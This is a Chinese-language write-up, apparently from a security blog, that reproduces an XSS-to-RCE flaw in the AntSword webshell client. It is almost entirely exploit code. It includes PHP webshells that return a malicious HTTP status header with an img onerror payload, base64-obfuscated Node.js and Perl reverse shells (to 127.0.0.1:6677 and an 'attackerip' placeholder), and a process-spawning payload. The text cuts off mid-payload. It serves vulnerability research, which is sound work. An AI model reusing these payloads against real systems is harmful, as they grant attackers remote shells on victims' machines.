
antsword xss漏洞重现

0x00 概述 20190412,antsword的github上有个issus https://github.com/AntSwordProject/antSword/issues/147 因为toastr错误信息以html返回并且没有严格过滤导致xss,新版本修复不支持html。 比较有趣,重现一下   0x01 漏洞重现 环境:win7+phpstudy(php5.6.27-nts)+perl+nc+antsword2.0.5 1) XSS xss webshell: <?php header(‘HTTP/1.1 500 <img src=# onerror=alert`x`>’);   2) RCE win+nodejs 成功反弹shell。 var net = require(“net”), sh = require(“child_process”).exec(“cmd.exe”); var client = new net.Socket(); client.connect(6677, “127.0.0.1”, function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); <?php header(“HTTP/1.1 500 Not <img src=# onerror=’eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())’>”); ?>   未成功的组合: win+perl perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ # Win 平台 perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ <?php header(“HTTP/1.1 406 Not <img src=# onerror=’eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLU1JTyAtZSBcJiMzOTskYz1uZXcgSU86OlNvY2tldDo6SU5FVChQZWVyQWRkciwiMTI3LjAuMC4xOjY2NzciKTtTVERJTi0mZ3Q7ZmRvcGVuKCRjLHIpOyR+LSZndDtmZG9wZW4oJGMsdyk7c3lzdGVtJF8gd2hpbGUmbHQ7Jmd0OztcJiMzOTsmIzM5OywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0mZ3Q7ew0KICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOw0KICB9KTs=`,`base64`).toString())’>”); ?> require(‘child_process’).exec(‘perl -MIO -e \’$c=new IO::Socket::INET(PeerAddr,”127.0.0.1:6677″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\”,(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); }); Linux+perl 反弹 未测试 require(‘child_process’).exec(‘perl -e \’use 
Socket;$i=”127.0.0.1″;$p=6677;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/bash -i”);};\”,(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); }); <?php header(“HTTP/1.1 406 Not <img src=# onerror=’eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLWUgXCYjMzk7dXNlIFNvY2tldDskaT0iMTI3LjAuMC4xIjskcD02Njc3O3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCImZ3Q7JlMiKTtvcGVuKFNURE9VVCwiJmd0OyZTIik7b3BlbihTVERFUlIsIiZndDsmUyIpO2V4ZWMoIi9iaW4vYmFzaCAtaSIpO307XCYjMzk7JiMzOTssKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9Jmd0O3sNCiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsNCiAgfSk7`,`base64`).toString())’>”); ?> Linux+nodejs 未测试 var net = require(“net”), sh = require(“child_process”).exec(“/bin/bash”);var client = new net.Socket(); client.connect(6677, “127.0.0.1”, function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); <?php header(“HTTP/1.1 500 Not <img src=# onerror=’eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCIvYmluL2Jhc2giKTt2YXIgY2xpZW50ID0gbmV3IG5ldC5Tb2NrZXQoKTsNCmNsaWVudC5jb25uZWN0KDY2NzcsICIxMjcuMC4wLjEiLCBmdW5jdGlvbigpe2NsaWVudC5waXBlKHNoLnN0ZGluKTtzaC5zdGRvdXQucGlwZShjbGllbnQpOw0Kc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())’>”); ?> var Process = window.parent.top.process.binding(‘process_wrap’).Process;var proc = new Process(); proc.onexit = function (a, b) {};var env = window.parent.top.process.env;var env_ = [];for (var key in env) env_.push(key + ‘=’ + env[key]); proc.spawn({ file: ‘cmd.exe’, args: [‘/k……